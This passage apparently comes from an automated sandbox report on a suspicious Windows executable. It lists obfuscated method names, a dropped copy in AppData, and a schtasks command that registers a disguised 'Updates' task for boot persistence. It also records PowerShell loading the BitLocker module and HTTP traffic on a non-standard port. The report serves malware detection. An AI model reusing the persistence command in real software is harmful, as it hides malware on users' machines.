                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, HsrGlV44lLvBViRtCU.csHigh entropy of concatenated method names: 'eEmE56mcv1', 'nCcE0PNAC9', 'mQEE642m7M', 'aPREuwNgC0', 'N13EbNgWF6', 'AlVE99oDp3', 'OVHExraLc9', 'J2CEWo5ut6', 'tPXEd9opBA', 'rvWEj9Bq0v'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, hxdbkFBDOG3GYXCC6J.csHigh entropy of concatenated method names: 'ToString', 'DaONmYJpON', 'MDANQnT1CQ', 'TkmNOPPjen', 'MBFN3pLBEP', 'PIQN1Mdar1', 'H8yNGy95LZ', 'My5NU5Dp2c', 'jgrNV8sswV', 'VVZNF6iToB'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, ojhQbu8XUN2SA1YWIn.csHigh entropy of concatenated method names: 'ptiXdpFyiC', 's37XjtV83R', 'ToString', 'UIaX5RQAAE', 'Y07X0EIxO1', 'OWYX6yiegV', 'zywXuiKGYY', 'qPqXb31ZK6', 'y5TX9ajlLV', 'uQVXx9Js1b'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, W031NeDnxJaKh7kq0m.csHigh entropy of concatenated method names: 'm0P6KnjpwJ', 'C1R6tybQc5', 'LRj6ruwArP', 't4E6DnRvqG', 'dxy6y3GhN4', 'Ped6NEv4mA', 'yGy6XRLMF3', 'fuO6ER3fS5', 'c9n6TktAQC', 'S166pZnbNT'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, W92IZu2gnM5iBLPmiS8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q0Bphobp2C', 'PrgpS09pe0', 'IJLpBdNisU', 'CWLp8k7pEs', 'JSCp7bI3Sh', 'fhmpfmo0TT', 'K1vpijpUCc'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, Y9DXAaJuhWSHPRE4Ex.csHigh entropy of concatenated method names: 'w7YnMSgLC', 'D77Kk0FlJ', 'b96tmiT1r', 'H9msNbxGx', 'oiuDitd3m', 'v7vPg1b0Q', 'CqDeN6rErw82KPCB7j', 'YoK4FpWP4uIsWkNfxA', 'Lncefsw3BuGyDbf5bV', 'UbpEm1p7Q'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, EUgWJP05fVsWnH2ls3.csHigh entropy of concatenated method names: 'Dispose', 'KXH2v1bafu', 'R6UJQQxDqV', 'yygxxteD6Y', 'JQs2HrGlV4', 'tLv2zBViRt', 'ProcessDialogKey', 'dUDJYLRVVH', 'iDsJ2kkQkH', 'KidJJZB9Mf'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, fhbI0kfI6Vya1Km65c.csHigh entropy of concatenated method names: 'KK9X4GeJ2k', 'K3wXHpC4LI', 'ADgEYnsshE', 'wAXE2hFIS8', 'ReVXm8baBj', 'vxXXabE2Jb', 'gUkXI7HqcD', 'hwoXh0uHl2', 'k9cXSYS54C', 'VSFXBrx37r'
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile created: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpBC1E.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49749
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
